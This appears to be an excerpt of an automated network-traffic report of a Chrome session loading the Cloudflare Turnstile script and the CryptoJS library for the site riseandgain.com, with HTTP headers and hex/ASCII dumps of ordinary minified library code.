                                                Data Ascii: ,this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProcessB
                                                2024-08-20 13:41:57 UTC1369INData Raw: 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30 3f 31 3a 30
                                                Data Ascii: ?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0?1:0
                                                2024-08-20 13:41:57 UTC1369INData Raw: 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28
                                                Data Ascii: ]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i|0)+((
                                                2024-08-20 13:41:57 UTC1369INData Raw: 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36 37 32 39 36
                                                Data Ascii: *2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=4294967296
                                                2024-08-20 13:41:57 UTC1369INData Raw: 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29 2c 6d 3d 43
                                                Data Ascii: m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38]),m=C
                                                2024-08-20 13:41:57 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63
                                                Data Ascii: call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<<o|c
                                                2024-08-20 13:41:57 UTC1369INData Raw: 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29 29 29 2c 42
                                                Data Ascii: tion(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5))),B


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                19192.168.2.1649743104.18.95.414435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:41:57 UTC543OUTGET /turnstile/v0/api.js HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: script
                                                Referer: https://riseandgain.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:41:57 UTC386INHTTP/1.1 302 Found
                                                Date: Tue, 20 Aug 2024 13:41:57 GMT
                                                Content-Length: 0
                                                Connection: close
                                                access-control-allow-origin: *
                                                cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                cross-origin-resource-policy: cross-origin
                                                location: /turnstile/v0/b/6790c32b9fc9/api.js
                                                Server: cloudflare
                                                CF-RAY: 8b62cdc9ef94425d-EWR
                                                alt-svc: h3=":443"; ma=86400


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                20192.168.2.1649744104.18.95.414435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:41:58 UTC558OUTGET /turnstile/v0/b/6790c32b9fc9/api.js HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: script
                                                Referer: https://riseandgain.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:41:58 UTC471INHTTP/1.1 200 OK
                                                Date: Tue, 20 Aug 2024 13:41:58 GMT
                                                Content-Type: application/javascript; charset=UTF-8
                                                Content-Length: 45035
                                                Connection: close
                                                accept-ranges: bytes
                                                last-modified: Thu, 15 Aug 2024 16:28:23 GMT
                                                cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                access-control-allow-origin: *
                                                cross-origin-resource-policy: cross-origin
                                                Server: cloudflare
                                                CF-RAY: 8b62cdce7db3178c-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-20 13:41:58 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 53 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 5f 3d 65 5b 75 5d 28 67 29 2c 70 3d 5f 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 61 28 66 29 3b 72 65 74 75 72 6e 7d 5f 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 4f 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                Data Ascii: "use strict";(function(){function St(e,r,a,o,c,u,g){try{var _=e[u](g),p=_.value}catch(f){a(f);return}_.done?r(p):Promise.resolve(p).then(o,c)}function Ot(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var u=e.apply(r,a);funct
                                                2024-08-20 13:41:58 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 5f 72 28 65 2c 72 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 24 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                Data Ascii: e}function _r(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function $e(e,r){return r=r!=nu
                                                2024-08-20 13:41:58 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 4a 65 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 62 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 43 74 28 65 29 7c 7c 4e 74 28 65 2c 72 29 7c 7c 4c 74 28 65 2c 72 29 7c 7c 6b 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 4e 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                Data Ascii: ray$/.test(a))return Je(e,r)}}function be(e,r){return Ct(e)||Nt(e,r)||Lt(e,r)||kt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ne(e,r){var a={label:0,sent:function(){if(u[0
                                                2024-08-20 13:41:58 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 46 74 3d 33 30 30 30 32 30 3b 76 61 72 20 6b 65 3d 33 30 30 30 33 30 3b 76 61 72 20 4c 65 3d 33 30 30 30 33 31 3b 76 61 72 20 42 3b 28 66 75
                                                Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Ft=300020;var ke=300030;var Le=300031;var B;(fu
                                                2024-08-20 13:41:58 UTC1369INData Raw: 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 75 65 7c 7c 28 75 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6c 65 3b 28 66 75 6e
                                                Data Ascii: e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ue||(ue={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var le;(fun
                                                2024-08-20 13:41:58 UTC1369INData Raw: 76 61 72 20 59 3d 22 30 2f 30 22 3b 66 75 6e 63 74 69 6f 6e 20 66 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64
                                                Data Ascii: var Y="0/0";function ft(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="d
                                                2024-08-20 13:41:58 UTC1369INData Raw: 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 63 2c 75 3d 4c 28 78 72 2c 28 63 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 63 21 3d 3d 76 6f 69 64 20 30 3f 63 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 67 2c 5f 3d 4c 28 77 72 2c 28 67 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 67 21 3d 3d 76 6f 69 64 20 30 3f 67 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 3b 72 65 74 75 72 6e 20 6f 26 26 75 3f 22
                                                Data Ascii: HAVING_TROUBLES,c,u=L(xr,(c=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&c!==void 0?c:"nonexistent"),g,_=L(wr,(g=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==null&&g!==void 0?g:"nonexistent");return o&&u?"
                                                2024-08-20 13:41:58 UTC1369INData Raw: 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 61 29 7d 2c 73 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 5a 74 28 65 29 7b 72 65 74 75 72 6e 20 46 75 6e 63 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 50 65 28 65 29 7b 76 61 72 20 72 3d 74 79 70 65 6f 66 20 4d 61 70 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 65 77 20 4d 61 70 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 50 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 5a 74 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29
                                                Data Ascii: __proto__||Object.getPrototypeOf(a)},se(e)}function Zt(e){return Function.toString.call(e).indexOf("[native code]")!==-1}function Pe(e){var r=typeof Map=="function"?new Map:void 0;return Pe=function(o){if(o===null||!Zt(o))return o;if(typeof o!="function")
                                                2024-08-20 13:41:58 UTC1369INData Raw: 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72 2e 73 72 63 29 29 72 65 74 75 72 6e 20 72 3b 66 6f 72 28 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 63 72 69 70 74 22 29 2c 6f 3d 30 2c 63 3b 63 3d 61 5b 6f 5d 3b 6f 2b 2b 29 69 66 28 50 28 63 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 63 2e 73 72 63 29 29 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 61 72 28 29 7b 76 61 72 20 65 3d 67 74 28 29 3b 65 7c 7c 76 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34
                                                Data Ascii: riptElement)&&e.test(r.src))return r;for(var a=document.querySelectorAll("script"),o=0,c;c=a[o];o++)if(P(c,HTMLScriptElement)&&e.test(c.src))return c}function ar(){var e=gt();e||v("Could not find Turnstile script tag, some features may not be available",4
                                                2024-08-20 13:41:58 UTC1369INData Raw: 28 22 61 6c 6c 6f 77 22 2c 22 63 72 6f 73 73 2d 6f 72 69 67 69 6e 2d 69 73 6f 6c 61 74 65 64 3b 20 66 75 6c 6c 73 63 72 65 65 6e 22 29 2c 66 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 61 6e 64 62 6f 78 22 2c 22 61 6c 6c 6f 77 2d 73 61 6d 65 2d 6f 72 69 67 69 6e 20 61 6c 6c 6f 77 2d 73 63 72 69 70 74 73 20 61 6c 6c 6f 77 2d 70 6f 70 75 70 73 20 61 6c 6c 6f 77 2d 66 6f 72 6d 73 22 29 2c 66 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 63 72 6f 6c 6c 69 6e 67 22 2c 22 6e 6f 22 29 2c 66 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 57 69 64 74 68 3d 22 30 70 78 22 2c 66 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 25 22 2c 66 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 25 22 2c 66 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64
                                                Data Ascii: ("allow","cross-origin-isolated; fullscreen"),f.setAttribute("sandbox","allow-same-origin allow-scripts allow-popups allow-forms"),f.setAttribute("scrolling","no"),f.style.borderWidth="0px",f.style.width="100%",f.style.height="100%",f.style.overflow="hidd


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                21192.168.2.1649745104.17.24.144435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:41:58 UTC386OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                Host: cdnjs.cloudflare.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:41:58 UTC960INHTTP/1.1 200 OK
                                                Date: Tue, 20 Aug 2024 13:41:58 GMT
                                                Content-Type: application/javascript; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Access-Control-Allow-Origin: *
                                                Cache-Control: public, max-age=30672000
                                                ETag: W/"5eb03e2d-bb78"
                                                Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                cf-cdnjs-via: cfworker/kv
                                                Cross-Origin-Resource-Policy: cross-origin
                                                Timing-Allow-Origin: *
